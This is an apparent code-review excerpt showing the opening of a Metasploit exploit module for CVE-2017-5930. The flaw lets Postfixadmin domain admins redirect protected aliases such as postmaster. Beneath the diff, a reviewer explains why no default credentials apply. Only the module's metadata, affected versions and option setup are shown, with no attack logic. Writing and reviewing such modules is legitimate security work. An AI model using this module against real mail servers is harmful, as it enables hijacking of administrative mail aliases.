modules/exploits/unix/webapp/pfadmin_protected_alias.rb

```diff
@@ -0,0 +1,141 @@
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HTTP::PostfixAdmin
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'Postfixadmin Protected Alias Deletion Vulnerability',
+      'Description'     => %q{
+        Older Postfixadmin versions do not check if an admin is allowed to delete
+        protected aliases. This vulnerability can be used to redirect protected aliases
+        to an other mail address. Eg. rewrite the postmaster@domain alias
+      },
+      'Author'          => [ 'Jan-Frederik Rieckers' ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2017-5930'],
+          ['URL', 'https://github.com/postfixadmin/postfixadmin/pull/23'],
+          ['BID', '96142'],
+        ],
+      'Privileged'      => true,
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [[ 'Postfixadmin v2.91 - v3.0.1', {}]],
+      'DisclosureDate'  => 'Feb 03 2017',
+    ))
+
+    register_options(
+      [
+        OptString.new("USERNAME", [true, "The Postfixadmin username to authenticate with"]),
```

Comment:
No, there isn't.
The default admin login is set during the setup process and is not specified to a username/password and the exploit is only useful for domain admins, by default the initially set up admin account is a super admin who has the right to edit the protected aliases